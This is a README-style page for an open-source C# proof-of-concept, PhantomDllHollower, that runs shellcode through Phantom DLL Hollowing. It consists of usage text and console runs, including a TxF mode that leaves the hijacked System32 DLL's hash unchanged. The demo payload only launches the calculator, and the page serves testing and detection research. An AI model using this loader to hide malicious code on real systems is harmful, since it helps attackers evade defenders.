C# Implementation of Phantom DLL Hollowing
2023-06-13 09:17:11
C:\Tools>PhantomDllHollower.exe
PhantomDllHollower - Tool for testing Phantom DLL Hollowing.
Usage: PhantomDllHollower.exe [Options]
-h, --help : Displays this help message.
-p, --payload : Specifies shellcode to execute.
-t, --txf : Flag to use TxF. This option requires administrative privilege.
[!] -p option is required.
To use this PoC, specify the shellcode file to execute, as shown below:
C:\Tools>powershell -c Get-Process calc*
C:\Tools>PhantomDllHollower.exe -p calc.bin
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[+] Got target module path.
[*] Target : C:\Windows\system32\aadauthhelper.dll
[>] Trying to create section object for payload.
[+] Payload section object is created successfully.
[*] Section Handle : 0x2CC
[>] Trying to map payload section.
[+] Payload Section is mapped at 0x00007FF86D2C0000.
[>] Trying to write shellcode to payload section's entry point.
[*] Entry Point @ 0x00007FF86D2C2900
[+] Shellcode is written successfully.
[>] Executing your shellcode.
[+] Shellcode thread is created successfully.
[*] Waiting for shellcode thread exit.
[*] Done.
C:\Tools>powershell -c Get-Process calc*
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
598 49 30140 74824 0.34 7760 1 CalculatorApp
To use the TxF technique, set the -t flag together with the shellcode file path. This option requires administrative privilege:
C:\Tools>certutil -hashfile C:\Windows\System32\concrt140.dll sha1
SHA1 hash of C:\Windows\System32\concrt140.dll:
2497d0e241c1adf74f03d7d6065e0e0dd365a9d9
CertUtil: -hashfile command completed successfully.
C:\Tools>powershell -c Get-Process calc*
C:\Tools>whoami /groups | findstr /i level
Mandatory Label\High Mandatory Level Label S-1-16-12288
C:\Tools>PhantomDllHollower.exe -p calc.bin -t
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[*] TxF mode is enabled. This mode requires administrative privilege.
[+] Got target module path.
[*] Target : C:\Windows\system32\concrt140.dll
[>] Trying to generate payload data.
[+] Payload data is generated successfully.
[>] Trying to create section object for payload.
[+] Payload section object is created successfully.
[*] Section Handle : 0x318
[>] Trying to map payload section.
[+] Payload Section is mapped at 0x00007FF863F80000.
[*] Shellcode @ 0x00007FF863FAD030
[>] Executing your shellcode.
[+] Shellcode thread is created successfully.
[*] Waiting for shellcode thread exit.
[*] Done.
C:\Tools>certutil -hashfile C:\Windows\System32\concrt140.dll sha1
SHA1 hash of C:\Windows\System32\concrt140.dll:
2497d0e241c1adf74f03d7d6065e0e0dd365a9d9
CertUtil: -hashfile command completed successfully.
C:\Tools>powershell -c Get-Process calc*
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
598 49 30136 55972 0.30 7504 1 CalculatorApp
If the -t flag is set without administrative privilege, the target DLL cannot be found, as shown below:
C:\Tools>powershell -c Get-Process calc*
C:\Tools>whoami /groups | findstr /i level
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
C:\Tools>PhantomDllHollower.exe -p calc.bin -t
[>] Trying to read payload from C:\Tools\calc.bin.
[+] Payload is read successfully (276 bytes).
[>] Searching target module file from C:\Windows\system32.
[*] TxF mode is enabled. This mode requires administrative privilege.
[-] Failed to find abusable module. You may not have sufficient privileges.
C:\Tools>powershell -c Get-Process calc*
https://github.com/daem0nc0re/TangledWinExec/tree/main/PhantomDllHollower